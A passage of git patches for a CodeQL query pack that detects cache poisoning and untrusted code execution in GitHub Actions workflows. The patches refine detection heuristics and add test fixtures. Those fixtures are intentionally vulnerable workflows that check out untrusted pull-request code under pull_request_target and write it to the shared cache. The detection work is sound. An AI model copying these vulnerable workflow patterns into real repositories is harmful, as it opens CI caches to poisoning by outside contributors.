Thu, 9 May 2024 23:32:21 +0200 Subject: [PATCH 0259/1267] Update PoisonableSteps --- .../actions/security/PoisonableSteps.qll | 26 ++++++++++++++----- 1 file changed, 19 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index f65bf5fb4dc..070dcbda532 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,8 +18,8 @@ private string dangerousCommands() { [ "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", - "^ant ", "mkdocs build", "pytest" + "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", + "pytest", "pip install -r ", "pip install --requirement", "java -jar " ] } @@ -31,21 +31,33 @@ class BuildRunStep extends PoisonableStep, Run { } } +bindingset[cmdRegexp] +string wrapLocalCmd(string cmdRegexp) { result = "(^|;\\s*|\\s+)" + cmdRegexp + "(\\s+|;|$)" } + class LocalCommandExecutionRunStep extends PoisonableStep, Run { string cmd; LocalCommandExecutionRunStep() { // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, ... exists(string line | line = this.getScript().splitAt("\n").trim() | // ./xxxx - cmd = line.regexpCapture("(^|\\s+)\\.\\/(.*)", 2) + // TODO: It could also be in the form of `dir/cmd` + cmd = line.regexpCapture(wrapLocalCmd("\\.\\/(.*)"), 2) or // sh xxxx - cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + cmd = line.regexpCapture(wrapLocalCmd("(ba|z|fi)?sh\\s+(.*)"), 3) or - // node xxxx - cmd = line.regexpCapture("(^|\\s+)(node|python|ruby|go)\\s+(.*)", 3) + // node xxxx.js + cmd = line.regexpCapture(wrapLocalCmd("node\\s+(.*)(\\.js|\\.ts)"), 2) + or + // python xxxx.py + cmd = line.regexpCapture(wrapLocalCmd("python\\s+(.*)\\.py"), 2) + or + // ruby xxxx.rb + cmd = line.regexpCapture(wrapLocalCmd("ruby\\s+(.*)\\.rb"), 2) + or + // go xxxx.go + cmd = line.regexpCapture(wrapLocalCmd("go\\s+(.*)\\.go"), 2) ) } From 4d612044049e206bba6f01c49c9e49937c3b33ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:12:25 +0200 Subject: [PATCH 0260/1267] New tests --- ql/test/library-tests/test.expected | 14 ++++++++++++ .../CWE-349/.github/workflows/test13.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test14.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test15.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test16.yml | 22 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 ++ 6 files changed, 104 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c735596ae05..61f7120e78e 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -98,6 +98,10 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | parentNodes | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | @@ -136,8 +140,14 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:2:3:2:14 | workflow_run | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | @@ -163,6 +173,10 @@ parentNodes | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml new file mode 100644 index 00000000000..72106b9d69b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml new file mode 100644 index 00000000000..31c820904cd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml new file mode 100644 index 00000000000..d3f51456de2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml new file mode 100644 index 00000000000..ec0f9b0e6c9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 75a370246cb..f0ee6d70001 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -6,3 +6,5 @@ | .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | From 8590a0ba8fbf99e48f58d40eeb7bb33212f0a253 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:12:54 +0200 Subject: [PATCH 0261/1267] Refactor runOnDefaultBranch --- .../actions/security/CachePoisoningQuery.qll | 50 +++++++++++++++++++ ql/src/Security/CWE-349/CachePoisoning.ql | 14 +----- .../CWE-349/CachePoisoningByCodeInjection.ql | 15 +----- 3 files changed, 53 insertions(+), 26 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 9762e9d9078..5ac2a855e9f 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,6 +10,56 @@ string defaultBranchTriggerEvent() { ] } +predicate test(Event e) { + e.getName() = "pull_request_target" and + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] +} + +predicate runsOnDefaultBranch(Job j) { + exists(Event e | + j.getATriggerEvent() = e and + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = ["main", "master", "default"] + or + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + ) + ) + ) + or + j.getATriggerEvent().getName() = "workflow_call" and + exists(ExternalJob call | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(call) + ) +} + abstract class CacheWritingStep extends Step { } class CacheActionUsesStep extends CacheWritingStep, UsesStep { diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 7bcbe693566..11da318f474 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -21,19 +21,7 @@ where // Excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch - // TODO: (require to collect trigger types) - // - add push to default branch? - // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - ( - j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) - or - j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.hasTriggerEvent(defaultBranchTriggerEvent()) - ) - ) and + runsOnDefaultBranch(j) and // The job checkouts untrusted code from a pull request j.getAStep() = checkout and ( diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index e02b64e9ec5..5d739d746d5 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -21,21 +21,10 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Local where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and + // Excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch - // TODO: (require to collect trigger types) - // - add push to default branch? - // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - ( - j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) - or - j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.hasTriggerEvent(defaultBranchTriggerEvent()) - ) - ) + runsOnDefaultBranch(j) select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From e0d147f39acdfb2d579a85417dea02af73e065f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:13:44 +0200 Subject: [PATCH 0262/1267] Add On and Event AST nodes Capture information about trigger events on the new On and Event classes --- ql/lib/codeql/actions/Ast.qll | 24 +++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 93 +++++++++++++++---- .../CodeExecutionOnSelfHostedRunner.ql | 2 +- 3 files changed, 96 insertions(+), 23 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5daa99d142e..1e57c8f3d29 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -254,13 +254,13 @@ class Workflow extends AstNode instanceof WorkflowImpl { Job getJob(string jobId) { result = super.getJob(jobId) } - predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - - string getATriggerEvent() { result = super.getATriggerEvent() } + Event getATriggerEvent() { result = super.getATriggerEvent() } Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + On getOn() { result = super.getOn() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -305,6 +305,20 @@ class Needs extends AstNode instanceof NeedsImpl { Job getANeededJob() { result = super.getANeededJob() } } +class On extends AstNode instanceof OnImpl { + Event getAnEvent() { result = super.getAnEvent() } +} + +class Event extends AstNode instanceof EventImpl { + string getName() { result = super.getName() } + + string getAnActivityType() { result = super.getAnActivityType() } + + string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } + + predicate hasProperty(string prop) { super.hasProperty(prop) } +} + /** * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. @@ -328,9 +342,7 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } - predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - - string getATriggerEvent() { result = super.getATriggerEvent() } + Event getATriggerEvent() { result = super.getATriggerEvent() } Strategy getStrategy() { result = super.getStrategy() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index fca9298794f..e8a92a41142 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -68,6 +68,16 @@ private newtype TAstNode = TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TOnNode(YamlMappingLikeNode n) { exists(YamlMapping w | w.lookup("on") = n) } or + TEventNode(YamlScalar event, YamlMappingLikeNode n) { + exists(OnImpl o | + o.getNode().(YamlMapping).maps(event, n) + or + o.getNode().(YamlSequence).getAChildNode() = event and event = n + or + o.getNode().(YamlScalar) = n and event = n + ) + } or TStepNode(YamlMapping n) { exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) } or @@ -308,6 +318,9 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override YamlMapping getNode() { result = n } + /** Gets the `on` trigger events for this workflow. */ + OnImpl getOn() { result.getNode() = n.lookup("on") } + /** Gets the 'global' `env` mapping in this workflow. */ EnvImpl getEnv() { result.getNode() = n.lookup("env") } @@ -323,15 +336,8 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } - /** Workflow is triggered by given trigger event */ - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) - } - /** Gets the trigger event that starts this workflow. */ - string getATriggerEvent() { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) - } + EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } @@ -573,6 +579,66 @@ class NeedsImpl extends AstNodeImpl, TNeedsNode { } } +class OnImpl extends AstNodeImpl, TOnNode { + YamlMappingLikeNode n; + + OnImpl() { this = TOnNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "OnImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets an event that triggers the workflow. */ + EventImpl getAnEvent() { result.getParentNode() = this } +} + +class EventImpl extends AstNodeImpl, TEventNode { + YamlScalar e; + YamlMappingLikeNode n; + + EventImpl() { this = TEventNode(e, n) } + + override string toString() { result = e.getValue() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override OnImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EventImpl" } + + override Location getLocation() { result = e.getLocation() } + + override YamlScalar getNode() { result = e } + + /** Gets the name of the event that triggers the workflow. */ + string getName() { result = e.getValue() } + + /** Gets the Yaml Node associated with the event if any */ + YamlMappingLikeNode getValueNode() { result = n } + + /** Gets an activity type */ + string getAnActivityType() { + result = + n.(YamlMapping).lookup("types").(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Gets a string value for any property (eg: branches, branches-ignore, etc.) */ + string getAPropertyValue(string prop) { + result = n.(YamlMapping).lookup(prop).(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Holds if the event has a property with the given name */ + predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } +} + class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; @@ -686,7 +752,7 @@ class JobImpl extends AstNodeImpl, TJobNode { // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. // The Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] + not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] or // The Workflow is only triggered by `workflow_call` and there is // a caller workflow triggered by an event other than `pull_request` @@ -701,16 +767,11 @@ class JobImpl extends AstNodeImpl, TJobNode { count(this.getATriggerEvent()) > 1 } - /** Workflow is triggered by given trigger event */ - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) - } - /** Gets the trigger event that starts this workflow. */ - string getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and + this.getATriggerEvent().getName() = trigger and count(this.getATriggerEvent()) = 1 } diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index c7bdfbbc323..90997f63631 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -21,7 +21,7 @@ import codeql.actions.dataflow.ExternalFlow */ predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | - job.getEnclosingWorkflow().getATriggerEvent() = + job.getEnclosingWorkflow().getATriggerEvent().getName() = ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and label = job.getARunsOnLabel() and // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 From 510cefecbe1e678bb6be20fc5baa7310a38a2a42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:59:12 +0200 Subject: [PATCH 0263/1267] Remove debug left-overs --- .../actions/security/CachePoisoningQuery.qll | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 5ac2a855e9f..ab0f2d0809a 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,14 +10,7 @@ string defaultBranchTriggerEvent() { ] } -predicate test(Event e) { - e.getName() = "pull_request_target" and - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] -} +string defaultBranchNames() { result = ["main", "master", "default"] } predicate runsOnDefaultBranch(Job j) { exists(Event e | @@ -27,7 +20,7 @@ predicate runsOnDefaultBranch(Job j) { not e.getName() = "pull_request_target" or e.getName() = "push" and - e.getAPropertyValue("branches") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() or e.getName() = "pull_request_target" and ( @@ -37,18 +30,18 @@ predicate runsOnDefaultBranch(Job j) { // only branches-ignore filter e.hasProperty("branches-ignore") and not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() or // only branches filter e.hasProperty("branches") and not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() or // branches and branches-ignore filters e.hasProperty("branches") and e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) ) From 9310150fb027ad6e85bcb266091b4093eb833eba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 09:20:45 +0200 Subject: [PATCH 0264/1267] Resolve conflict --- ql/lib/codeql/actions/ast/internal/Ast.qll | 100 ++++++++++++++---- .../actions/security/SelfHostedQuery.qll | 34 ++++++ .../CodeExecutionOnSelfHostedRunner.ql | 31 +----- .../CWE-284/.github/workflows/test1.yml | 66 ++++++++++++ .../CodeExecutionOnSelfHostedRunner.expected | 6 +- 5 files changed, 186 insertions(+), 51 deletions(-) create mode 100644 ql/lib/codeql/actions/security/SelfHostedQuery.qll diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e8a92a41142..5e4f078bc3a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -544,9 +544,15 @@ class StrategyImpl extends AstNodeImpl, TStrategyNode { override YamlMapping getNode() { result = n } - /** Gets a specific matric expression (YamlMapping) by name. */ - ExpressionImpl getMatrixVarExpr(string name) { - n.lookup("matrix").(YamlMapping).lookup(name) = result.getNode() + YamlMapping getMatrix() { result = n.lookup("matrix") } + + /** Gets a specific matrix expression (YamlMapping) by name. */ + ExpressionImpl getMatrixVarExpr(string accessPath) { + exists(MatrixAccessPathImpl p, ScalarValueImpl v | + p.toString() = accessPath and + resolveMatrixAccessPath(n.lookup("matrix"), p).getNode(_) = v.getNode() and + result.getParentNode() = v + ) } /** Gets a specific matric expression (YamlMapping) by name. */ @@ -777,14 +783,27 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the runs-on field of the job. */ string getARunsOnLabel() { - exists(string lbl, YamlNode r | + exists(ScalarValueImpl lbl | ( - r = runson.getNode(lbl) and - not lbl = ["group", "labels"] + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") or - r = runson.getNode("labels").(YamlMappingLikeNode).getNode(lbl) + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) ) and - result = lbl.trim().regexpReplaceAll("^('|\")", "").regexpReplaceAll("('|\")$", "").trim() + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) + ) ) } } @@ -1050,7 +1069,7 @@ private string jobsCtxRegex() { private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } +private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.(.+)") } private string inputsCtxRegex() { result = @@ -1224,24 +1243,65 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { * e.g. `${{ matrix.foo }}` */ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { - string fieldName; + string fieldAccess; MatrixExpressionImpl() { Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + fieldAccess = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } - override string getFieldName() { result = fieldName } + override string getFieldName() { result = fieldAccess } override AstNodeImpl getTarget() { - exists(WorkflowImpl w | - w.getStrategy().getMatrixVarExpr(fieldName) = result and - w.getAChildNode*() = this - ) - or - exists(JobImpl j | - 